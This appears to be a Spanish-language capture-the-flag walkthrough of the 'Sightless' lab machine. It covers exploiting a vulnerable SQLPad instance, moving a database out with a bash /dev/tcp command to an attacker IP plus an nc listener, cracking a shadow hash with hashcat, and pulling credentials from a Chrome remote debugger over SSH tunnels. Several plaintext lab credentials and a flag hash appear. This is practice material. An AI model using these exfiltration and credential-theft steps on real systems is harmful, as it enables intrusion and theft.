Analizando al web hay un subdominio sqlpad
y si analizamos las peticiones vesmos que hace peticiones a un direcotrio api y si nos metemos en alguno de los que hace peticiones vemos la version del servicio la cual es vulnerable con este codigo (https://github.com/0xRoqeeb/sqlpad-rce-exploit-CVE-2022-0944)
dentro del equipo hay un archivo sqlpad.sqlite
el cual nos lo vamos a transferir a nuestro equipo
- emisor
bash -c "cat sqlpad.sqlite > /dev/tcp/10.10.14.222/4443"
- receptor
nc -nlvp 4443 > sqlpad.sqlite
lo investigamos
da9a25f7-588c-40f5-89db-58fbebab591f|admin@sightless.htb|admin||10$cjbITibC.4BQQKJ8NOBUv.p0bG2n8t.RIIKRysR6pZnxquAWsLFcC||||2024-05-15 04:48:09.377 +00:00|2024-05-15 18:16:54.652 +00:00|0||
26113beb-60eb-4a58-81eb-2318e27eb3bf|john@sightless.htb|editor|||2d3499e3-16ba-4b4b-a49e-c7c5dca89f2d|||2024-05-15 12:29:23.725 +00:00|2024-05-15 12:29:27.257 +00:00||0|
Usuarios
admin - admin@sightless.htb - bcrypt -
$2a$10$cjbITibC.4BQQKJ8NOBUv.p0bG2n8t.RIIKRysR6pZnxquAWsLFcC
editor - john@singhtless.htb
pero no podemos hacer nada con eso (la fuerza bruta no es una opcion), vamos ver mas cosas
tenemos dos usuarios en el sistema vamos ver el shadow ya que somos root,
crakeamos con
hashcat -m 1800 -a 0 michael_hash /usr/share/wordlists/rockyou.txt -o michael_password
Creds: michael/insaneclownposse creds: root/blindside
Esto es interesante
aqui vermos monturas
/var/lib/docker/overlay2/l/
capabilities
mas monturas
posibles vulns
vamos a iniciar un ssh con el usuario michael
archivos /usr/bin/networkd-dispatcher /home/john/automation/healthcheck.sh /home/john/automation/administration.py /etc/laurel/config.toml
mirando los puetos en escucha de la maquina vamos a hacernos un portfowarding de la 8080 con ssh -L 8081:127.0.0.1:8080 michael@<IP>
y vemos una web
investigando debemos hacer uso de este metodo (https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/chrome-remote-debugger-pentesting/) para poder encontrar una conexion que se genera para ello tenemos que encontrar el puerto donde esta corriendo, por lo que tenemos que advinarlo, vamos a ir haciendo un port fowaring de cada uno de los puertos y vamos a ir agregandolos al navegador, de esta forma
ssh -L 8081:127.0.0.1:8080 -L 42899:127.0.0.1:42899 -L 33060:127.0.0.1:33060 -L 43927:127.0.0.1:43927 -L 43571:127.0.0.1:43571 michael@10.10.11.32
una vez puesto todos los puertos ahora vamos a agregarlos a nuestro navegador
Metodos
- Google Chrome:
Chrome://inspect/#devices
- Firefox:
about:debugging#/setup
127.0.0.1:3000
127.0.0.1:33060
127.0.0.1:55801
127.0.0.1:41669
127.0.0.1:42553
y los agregamos
y vemos que nos ha saalido esto si ahora clic en inspect y revisamos la network veremos las claves de inicio
vamos a iniciar con esos credenciales
admin/ForlorfroxAdmin
y la version es vulnerable por lo que podemos usar este script Link o tambien:
ahora lo deshabilitamos y habilitamos y ya esta
ahora le damos permisos y listo
ff5229400a1770ae6e37f0733b25fb77